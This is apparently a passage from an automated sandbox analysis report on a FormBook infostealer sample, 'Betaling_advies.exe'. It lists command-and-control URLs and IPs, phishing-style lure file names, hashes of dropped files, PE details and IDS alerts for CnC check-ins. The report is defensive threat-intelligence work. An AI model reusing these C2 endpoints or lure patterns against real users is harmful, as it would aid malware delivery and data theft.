                                                                            m5bCbJdk7l.exeGet hashmaliciousBrowse
                                                                            • www.wellnesssensation.com/bw82/?9r=Cxl0GPu0O4YH8&lL08q=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z8vR+r7QFaHyR2mgcw==
                                                                            xloa.exeGet hashmaliciousBrowse
                                                                            • www.wellnesssensation.com/bw82/?cjlti=VTjl4FmxEtYHGD&FdR0zJRX=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj
                                                                            rbyB1UHXxR.exeGet hashmaliciousBrowse
                                                                            • www.wellnesssensation.com/bw82/?jL34YR=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/Dr9qXrGtmj&w0=mfJDabjXTrYll
                                                                            4137.exeGet hashmaliciousBrowse
                                                                            • www.bsf.xyz/krc/?XPGx_BL8=oSG3T25g44YEqdHLNcXBvI98o2n2iP7ZIEUUkJplaCBty9zlxmxYbQ+JtR5ITo/P6k1v&5jrH=7n6ti6PHWBWtUvjp
                                                                            COAU7229898130.xlsxGet hashmaliciousBrowse
                                                                            • www.digitalkn.com/jzvu/?lf=cEqLwIJ7aWwgZaEBQQ3QvunM083gkoJjrLxEAqrbF665+asBfL1SMAPlNHXrwB48pebAWQ==&JreT=PJE0oxE
                                                                            RFQ_OB Jiefeng E&E Co Ltd.exeGet hashmaliciousBrowse
                                                                            • www.coursesnap.com/vxwp/?oN60n=aoI/2ttuUri1IfMVTWjSMRAkTYr7wua1r9tN8sGSVQKIq85GZ0w6gmxLUvfA/w2PCQdu&lbipbd=i48pk
                                                                            FB_1401_4_5,pdf.exeGet hashmaliciousBrowse
                                                                            • www.ypb.xyz/gh6n/?Jfy=Sqiid3V0km2wxmfK50/u5WHvN3QLl6P+VgZ6E7O0fsICj+IsRQ4glH473P9HMnWgDxHx&ndZHKd=R48xo
                                                                            55gfganfgF.exeGet hashmaliciousBrowse
                                                                            • www.wellnesssensation.com/bw82/?_FQl2b=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z8vR+r7QFaHyR2mgcw==&oX9=Z0D4XL4pfLe8-hP
                                                                            QUOTATION00187612.exeGet hashmaliciousBrowse
                                                                            • www.condolence.xyz/nsk/?5juH1Lw=FYdOMEq/l0425zB2F165eTcCuV5zwQcH/ZXNrxlH4Hif5qg1IOYzj5CtMIOwqQ4asrXS&kxl0dL=nDH8a8R86Pb8o
                                                                            IKtgCGdzlg.exeGet hashmaliciousBrowse
                                                                            • www.wellnesssensation.com/bw82/?9rjHF6y=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z8vohabTLMb1R2mnPA==&lX9d=p48hVnrp1tqPRT7P
                                                                            vB1Zux02Zf.exeGet hashmaliciousBrowse
                                                                            • www.wellnesssensation.com/bw82/?9rn=Ch2H98AXZPNlB&jH5XY=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z8vR+r7QFaHyR2mgcw==
                                                                            vBugmobiJh.exeGet hashmaliciousBrowse
                                                                            • www.wellnesssensation.com/bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj
                                                                            CMahQwuvAE.exeGet hashmaliciousBrowse
                                                                            • www.wellnesssensation.com/bw82/?CneDg=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/Dr9qXrGtmj&Dxlpd=2dmp

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            parkingpage.namecheap.comgqnTRCdv5u.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.211
                                                                            eQLPRPErea.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.215
                                                                            PaymentAdvice.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.218
                                                                            DYANAMIC Inquiry.xlsxGet hashmaliciousBrowse
                                                                            • 198.54.117.216
                                                                            Quotation Zhejiang.xlsxGet hashmaliciousBrowse
                                                                            • 198.54.117.215
                                                                            TACA20210407.PDF.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.212
                                                                            46578-TR.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.218
                                                                            ALPHA SCIENCE, INC.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.216
                                                                            SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.217
                                                                            1517679127365.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.216
                                                                            BL-2010403L.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.218
                                                                            Shinshin Machinery.exe.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.212
                                                                            PDF NEW P.OJerhWEMSj4RnE4Z.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.217
                                                                            INV-210318L.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.212
                                                                            Inquiry.docxGet hashmaliciousBrowse
                                                                            • 198.54.117.218
                                                                            BL Draft copy.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.215
                                                                            Order.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.210
                                                                            PO.1183.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.211
                                                                            TSPO0001978-xlxs.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.216
                                                                            evaoRJkeKU.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.210

                                                                            ASN

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            NAMECHEAP-NETUSnova narud#U017eba pdf rvP6N.exeGet hashmaliciousBrowse
                                                                            • 63.250.37.200
                                                                            gqnTRCdv5u.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.211
                                                                            Calt7BoW2a.exeGet hashmaliciousBrowse
                                                                            • 63.250.43.5
                                                                            eQLPRPErea.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.215
                                                                            vbc.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.244
                                                                            000OUTQ080519103.pdf.exeGet hashmaliciousBrowse
                                                                            • 198.54.126.159
                                                                            PaymentAdvice.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.218
                                                                            DYANAMIC Inquiry.xlsxGet hashmaliciousBrowse
                                                                            • 198.54.117.216
                                                                            Quotation Zhejiang.xlsxGet hashmaliciousBrowse
                                                                            • 198.54.117.215
                                                                            quotation.exeGet hashmaliciousBrowse
                                                                            • 162.0.229.227
                                                                            PU Request Form Hardware.exeGet hashmaliciousBrowse
                                                                            • 198.54.126.165
                                                                            URGENT INQUIRY.exeGet hashmaliciousBrowse
                                                                            • 198.54.126.165
                                                                            8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xlsGet hashmaliciousBrowse
                                                                            • 63.250.38.60
                                                                            8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xlsGet hashmaliciousBrowse
                                                                            • 63.250.38.60
                                                                            8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xlsGet hashmaliciousBrowse
                                                                            • 63.250.38.60
                                                                            Protected Client.jsGet hashmaliciousBrowse
                                                                            • 199.192.24.250
                                                                            one new parcel.exeGet hashmaliciousBrowse
                                                                            • 199.193.7.228
                                                                            Protected Client.jsGet hashmaliciousBrowse
                                                                            • 199.192.24.250
                                                                            LIHUA Technology HK Order Items.exeGet hashmaliciousBrowse
                                                                            • 198.54.114.191
                                                                            234501209-416_000_decrypted.xlsGet hashmaliciousBrowse
                                                                            • 63.250.38.60
                                                                            DOSARRESTUSOrder.exeGet hashmaliciousBrowse
                                                                            • 52.128.23.218
                                                                            MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                                                            • 52.128.23.153
                                                                            bank details.exeGet hashmaliciousBrowse
                                                                            • 52.128.23.218
                                                                            50729032021.xlsxGet hashmaliciousBrowse
                                                                            • 52.128.23.153
                                                                            MACHINE SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                                            • 52.128.23.153
                                                                            Shipping Documents C1216.exeGet hashmaliciousBrowse
                                                                            • 52.128.23.153
                                                                            9V3LjvhSMb.exeGet hashmaliciousBrowse
                                                                            • 52.128.23.153
                                                                            RDAW-180-47D.exeGet hashmaliciousBrowse
                                                                            • 52.128.23.153
                                                                            gV8xdP8bas.exeGet hashmaliciousBrowse
                                                                            • 52.128.23.153
                                                                            m5bCbJdk7l.exeGet hashmaliciousBrowse
                                                                            • 52.128.23.153
                                                                            xloa.exeGet hashmaliciousBrowse
                                                                            • 52.128.23.153
                                                                            rbyB1UHXxR.exeGet hashmaliciousBrowse
                                                                            • 52.128.23.153
                                                                            4137.exeGet hashmaliciousBrowse
                                                                            • 52.128.23.153
                                                                            COAU7229898130.xlsxGet hashmaliciousBrowse
                                                                            • 52.128.23.153
                                                                            RFQ_OB Jiefeng E&E Co Ltd.exeGet hashmaliciousBrowse
                                                                            • 52.128.23.153
                                                                            FB_1401_4_5,pdf.exeGet hashmaliciousBrowse
                                                                            • 52.128.23.153
                                                                            55gfganfgF.exeGet hashmaliciousBrowse
                                                                            • 52.128.23.153
                                                                            QUOTATION00187612.exeGet hashmaliciousBrowse
                                                                            • 52.128.23.153
                                                                            IKtgCGdzlg.exeGet hashmaliciousBrowse
                                                                            • 52.128.23.153
                                                                            vB1Zux02Zf.exeGet hashmaliciousBrowse
                                                                            • 52.128.23.153
                                                                            NOCIXUSTRANSFER CONFIRMATION_PDF.exeGet hashmaliciousBrowse
                                                                            • 192.187.111.221
                                                                            P1 032021.exeGet hashmaliciousBrowse
                                                                            • 192.187.111.221
                                                                            CUFUYO.exeGet hashmaliciousBrowse
                                                                            • 192.187.111.219
                                                                            Quotation.zip.exeGet hashmaliciousBrowse
                                                                            • 192.187.111.222
                                                                            SWIFT COPY_pdf.exeGet hashmaliciousBrowse
                                                                            • 107.150.55.90
                                                                            shippingdoc_pdf.exeGet hashmaliciousBrowse
                                                                            • 192.187.111.222
                                                                            Swift_18442.exeGet hashmaliciousBrowse
                                                                            • 192.187.120.242
                                                                            i7DmAbXBCN.exeGet hashmaliciousBrowse
                                                                            • 192.187.111.220
                                                                            Order 1759-pdf.exeGet hashmaliciousBrowse
                                                                            • 107.150.55.90
                                                                            Order List - 022321-xlxs.exeGet hashmaliciousBrowse
                                                                            • 107.150.55.90
                                                                            HEC Batangas Integrated LNG and Power Project DocumentationsType a message.exe.exeGet hashmaliciousBrowse
                                                                            • 192.187.111.219
                                                                            order pdf.exeGet hashmaliciousBrowse
                                                                            • 192.187.111.219
                                                                            NWvnpLrdx4.exeGet hashmaliciousBrowse
                                                                            • 198.204.251.78
                                                                            drTj5hZSCU.exeGet hashmaliciousBrowse
                                                                            • 192.187.111.219
                                                                            PO_210205.exeGet hashmaliciousBrowse
                                                                            • 107.150.35.42
                                                                            DHL00130.exe.exeGet hashmaliciousBrowse
                                                                            • 192.187.111.219
                                                                            MPbBCArHPF.exeGet hashmaliciousBrowse
                                                                            • 192.187.111.221
                                                                            Statement for T10495.jarGet hashmaliciousBrowse
                                                                            • 192.187.111.221
                                                                            ucPCgX1NlH.exeGet hashmaliciousBrowse
                                                                            • 192.187.111.220
                                                                            SHEXD2101127S_ShippingDocument_DkD.xlsxGet hashmaliciousBrowse
                                                                            • 192.187.111.221

                                                                            JA3 Fingerprints

                                                                            No context

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Temp\13ziwk3feeh4cg3
                                                                            Process:C:\Users\user\Desktop\Betaling_advies.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):164864
                                                                            Entropy (8bit):7.99882353222341
                                                                            Encrypted:true
                                                                            SSDEEP:3072:wJv7/Tz7+BuFMDnbz1WmD0L1LAtdVRp6ARGYqbQ644JHmGkxeaRpN:wJTzbebz1z4LOHfprkbJIeqpN
                                                                            MD5:A05C0E94DC1282B91B96F6C1FDD5F63F
                                                                            SHA1:F14CFFEC41EAA56F524912CEAB1E22BA12361723
                                                                            SHA-256:AFE9B2D1BDEC48CA8651243CDF592C19D2C2A893F44606F590AFE9617FF082CA
                                                                            SHA-512:E46BA9BCBA244042FC9FAF770690F27E129C7EEC20FFB57235684117CC56CB13EC5BAB42243B537C49C705286B5D697143925DAEA329EFEE9E579D96D631374F
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview: ..Ri~.._,...TU..?g..].w..`..(5HJ)...'T],.9V..8.5C.=.q1y.5..*...u...`.=.Uki....P4.SV..a4.q7..X...m........l...'s1..3..KF.c..u.R...m..).{=j&ff,.K.9.%.(_...%LU...s..F.......^..:..:."...'.O{....%.'..._.k.fq..h]i.'....m.t.Tl.M;.....&...%T2..[Y:Z.PW..+..Ht.R................qho...]q......*.3.j..6...j.".JO-......'..)7.m>uGU%P_~..E.P...@t..Z1..h.D......`..T.A_.ve....=!bs.1..[7.#.....s.,.9%..X."..Z_T.9<.:...e.M.a..m...._.4p..>.<.|.9.."..5....^o.?..i4.si.......{.>.K..D.*4...V.....0....`N"G..'..,.....a..>@..F...XU.....M.X....3b...`}j.3Z..ti*.^:...U.B..TU..../`.n<...6...lnV<lRx:.'..l....[..T..^2..+..uW.\.1dD$........HV.T......@...6..L..$o.~..ko(s..`.......L.=.........R..x..a....s.F!....<0.....8.]......h.......]P..0...L..).c.v,..............P...!.qJ.e$8-"..4.&.8.uY...'.b......m.xb]..S..=...%.5VQ.h.-em. ..\.`.x.9...U..U.......?.\.a.r3y.8.-@RZ..(z.......o....S.fm..|.\...Y.....S.`w..3..f..6.,L.>..@.........q.%........}*-....t.#......o.P.5v..f.p.F<.O*..
                                                                            C:\Users\user\AppData\Local\Temp\ac9e2jpx87kriao
                                                                            Process:C:\Users\user\Desktop\Betaling_advies.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):6661
                                                                            Entropy (8bit):7.964101605023504
                                                                            Encrypted:false
                                                                            SSDEEP:192:HV1mVwMvYyy6j1hWt5eSOpeMVcThjrdbf:HHmClb0qt5eSsctjr5f
                                                                            MD5:E04C934C0F6F1EA4EA554E1B0BEC3345
                                                                            SHA1:531D7A76E92E43CF60C78DC87BE67EA0D68E55EA
                                                                            SHA-256:677B71A1EE607B1D4ACA21E24D5A8CD71A4DE1B9E5A9169DB5D9EFB99845EEAB
                                                                            SHA-512:84F8469D89BB7A4FEC88ABBF04E29EF23C989DF9B962F529D8FEABA34496FB80CAF8693A0DAF90AF382EC9E8A4BF024E194B809FA2C9C2D8442A18C9F5BC3845
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview: ..gt..T...'......5.C.!.WC....A$l5.^...[...l..'@...W......1#.r9\.s.S4...up.g.B.J..Ne.H....^Y...O.........c.#.....!........5......]..=.....O.|..&.R.......W%..G%..u.1.....oJG..}..<]..HP..a..].A....0...x (&Mf.s..-.Q.E...3B.7...K`.>.5>.[c.....*d1.....&.F.!O@.W.t..%...U.Q.M"...F..J.Y..:YJ\.D.H^d..4D....w......<R.(.Y.=.+.,..Zn.s..vpW.TD.3.....k.v-.!;.Coj.....-..{.%{ic..M..r...T.f.&.-.#......L....V.?.%.........%]V8Ag.H9..C....r...JU....-...P...2.jt&#x.....CV.^.3.......B..7.._/Q.........".`.d..@.r...Z|..h...DJ.L.p>._x.}..f......e.S..tW;d..n....E...s..YnB...Z..!....5.a...<F=.}..e.6........G.)....J.QS..}.H.b..1\.w..P...L..k.......R.........+..P..u..q...6.If..u..C..M.L....?w.)..L!.aPQ.o4..-.g...px.....\.....2o.X-.......'.v....mf`...J..`.U.e.|...?m2....t....lx$2@[.[..,...l.}.t.`.m......U.....n.A..).(.,.fS..-.Z...*p..-(.Y.@..../..C.........TE.5...F......&..*..`O..$=....@BM.al.Z{.KI.E..?.{....M.l.`..]........60...1.^.............jxj[.CV.....RX..
                                                                            C:\Users\user\AppData\Local\Temp\nsx3A6A.tmp\571kzkbal.dll
                                                                            Process:C:\Users\user\Desktop\Betaling_advies.exe
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):4096
                                                                            Entropy (8bit):4.120535253677883
                                                                            Encrypted:false
                                                                            SSDEEP:48:vpgmHlS8KacYHvPviTLNuLebdsbriB4ZYmRC:BvPAyvPvinktfiuZVR
                                                                            MD5:4166A64CE914F377E415C32E619E5A71
                                                                            SHA1:7F9ABEFA1A35AA1D9E1ABD65C92B46DCD0A20BBE
                                                                            SHA-256:8D8B7E7780DB1D8172AA4499EC92942824DDEFF55026DBEE8BC40FD48547F317
                                                                            SHA-512:2D3AC79AE8012657F81E114971C01C14FD902AB57B8ECAC50A879510BFA5241AEA6426DD3640E3BADC661402F5B55A57302D5F822D51A41EF4EDB627AAA97194
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....n`...........!.........................................................`............@.......................... ..U....!.......@.......................P..L..." ..............................................$"...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..L....P......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                            Entropy (8bit):7.904368951251504
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                            • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:Betaling_advies.exe
                                                                            File size:206528
                                                                            MD5:5011945cdee260fb8688b06568d007b3
                                                                            SHA1:c0e27a58017d0cf737b86ff3ced063d120f7badd
                                                                            SHA256:96bd9ed85e93c31a337a92e99fd6e1966f68f1a28fef43a21da725c36405988c
                                                                            SHA512:d18287d8e88f9bd61ddd31245c9255aec80fbce710c6325933fdc914c563b765f2bfe38735cd743c6cbb31c916810a4a8cefde0b2eecda32f7b98fc570032e36
                                                                            SSDEEP:3072:HyewmN4skJ6n/lSJv7/Tz7+BuFMDnbz1WmD0L1LAtdVRp6ARGYqbQ644JHmGkxeq:HdD/oJTzbebz1z4LOHfprkbJIeqpG6
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.H............,...........:...!........&......e.......Rich....................PE..L.....8E.................Z....9.....J1.....

                                                                            File Icon

                                                                            Icon Hash:b2a88c96b2ca6a72

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x40314a
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                            DLL Characteristics:
                                                                            Time Stamp:0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:18bc6fa81e19f21156316b1ae696ed6b

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            sub esp, 0000017Ch
                                                                            push ebx
                                                                            push ebp
                                                                            push esi
                                                                            xor esi, esi
                                                                            push edi
                                                                            mov dword ptr [esp+18h], esi
                                                                            mov ebp, 00409240h
                                                                            mov byte ptr [esp+10h], 00000020h
                                                                            call dword ptr [00407030h]
                                                                            push esi
                                                                            call dword ptr [00407270h]
                                                                            mov dword ptr [007A3030h], eax
                                                                            push esi
                                                                            lea eax, dword ptr [esp+30h]
                                                                            push 00000160h
                                                                            push eax
                                                                            push esi
                                                                            push 0079E540h
                                                                            call dword ptr [00407158h]
                                                                            push 00409230h
                                                                            push 007A2780h
                                                                            call 00007F3F90CC2918h
                                                                            mov ebx, 007AA400h
                                                                            push ebx
                                                                            push 00000400h
                                                                            call dword ptr [004070B4h]
                                                                            call 00007F3F90CC0059h
                                                                            test eax, eax
                                                                            jne 00007F3F90CC0116h
                                                                            push 000003FBh
                                                                            push ebx
                                                                            call dword ptr [004070B0h]
                                                                            push 00409228h
                                                                            push ebx
                                                                            call 00007F3F90CC2903h
                                                                            call 00007F3F90CC0039h
                                                                            test eax, eax
                                                                            je 00007F3F90CC0232h
                                                                            mov edi, 007A9000h
                                                                            push edi
                                                                            call dword ptr [00407140h]
                                                                            call dword ptr [004070ACh]
                                                                            push eax
                                                                            push edi
                                                                            call 00007F3F90CC28C1h
                                                                            push 00000000h
                                                                            call dword ptr [00407108h]
                                                                            cmp byte ptr [007A9000h], 00000022h
                                                                            mov dword ptr [007A2F80h], eax
                                                                            mov eax, edi
                                                                            jne 00007F3F90CC00FCh
                                                                            mov byte ptr [esp+10h], 00000022h
                                                                            mov eax, 00000001h

                                                                            Rich Headers

                                                                            Programming Language:
                                                                            • [EXP] VC++ 6.0 SP5 build 8804

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x73440xb4.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3ac0000x900.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x59de0x5a00False0.681293402778data6.5143386598IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                            .rdata0x70000x10f20x1200False0.430338541667data5.0554281206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0x90000x39a0340x400unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                            .ndata0x3a40000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .rsrc0x3ac0000x9000xa00False0.409375data3.94574916515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountry
                                                                            RT_ICON0x3ac1900x2e8dataEnglishUnited States
                                                                            RT_DIALOG0x3ac4780x100dataEnglishUnited States
                                                                            RT_DIALOG0x3ac5780x11cdataEnglishUnited States
                                                                            RT_DIALOG0x3ac6980x60dataEnglishUnited States
                                                                            RT_GROUP_ICON0x3ac6f80x14dataEnglishUnited States
                                                                            RT_MANIFEST0x3ac7100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                            Imports

                                                                            DLLImport
                                                                            KERNEL32.dllCloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                                                            USER32.dllScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                            GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                            SHELL32.dllSHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                            ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                            COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                            ole32.dllOleInitialize, OleUninitialize, CoCreateInstance
                                                                            VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                            Possible Origin

                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            EnglishUnited States

                                                                            Network Behavior

                                                                            Snort IDS Alerts

                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                            04/08/21-12:38:24.397244TCP1201ATTACK-RESPONSES 403 Forbidden804974234.102.136.180192.168.2.4
                                                                            04/08/21-12:38:39.930010TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975680192.168.2.434.102.136.180
                                                                            04/08/21-12:38:39.930010TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975680192.168.2.434.102.136.180
                                                                            04/08/21-12:38:39.930010TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975680192.168.2.434.102.136.180
                                                                            04/08/21-12:38:40.043974TCP1201ATTACK-RESPONSES 403 Forbidden804975634.102.136.180192.168.2.4
                                                                            04/08/21-12:38:55.586497TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976380192.168.2.452.128.23.153
                                                                            04/08/21-12:38:55.586497TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976380192.168.2.452.128.23.153
                                                                            04/08/21-12:38:55.586497TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976380192.168.2.452.128.23.153
                                                                            04/08/21-12:39:00.894391TCP1201ATTACK-RESPONSES 403 Forbidden804976434.102.136.180192.168.2.4
                                                                            04/08/21-12:39:38.152108TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977180192.168.2.4156.241.53.253
                                                                            04/08/21-12:39:38.152108TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977180192.168.2.4156.241.53.253
                                                                            04/08/21-12:39:38.152108TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977180192.168.2.4156.241.53.253

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Apr 8, 2021 12:38:24.267389059 CEST4974280192.168.2.434.102.136.180
                                                                            Apr 8, 2021 12:38:24.281301022 CEST804974234.102.136.180192.168.2.4
                                                                            Apr 8, 2021 12:38:24.281589031 CEST4974280192.168.2.434.102.136.180
                                                                            Apr 8, 2021 12:38:24.281748056 CEST4974280192.168.2.434.102.136.180
                                                                            Apr 8, 2021 12:38:24.294466019 CEST804974234.102.136.180192.168.2.4
                                                                            Apr 8, 2021 12:38:24.397243977 CEST804974234.102.136.180192.168.2.4
                                                                            Apr 8, 2021 12:38:24.397293091 CEST804974234.102.136.180192.168.2.4
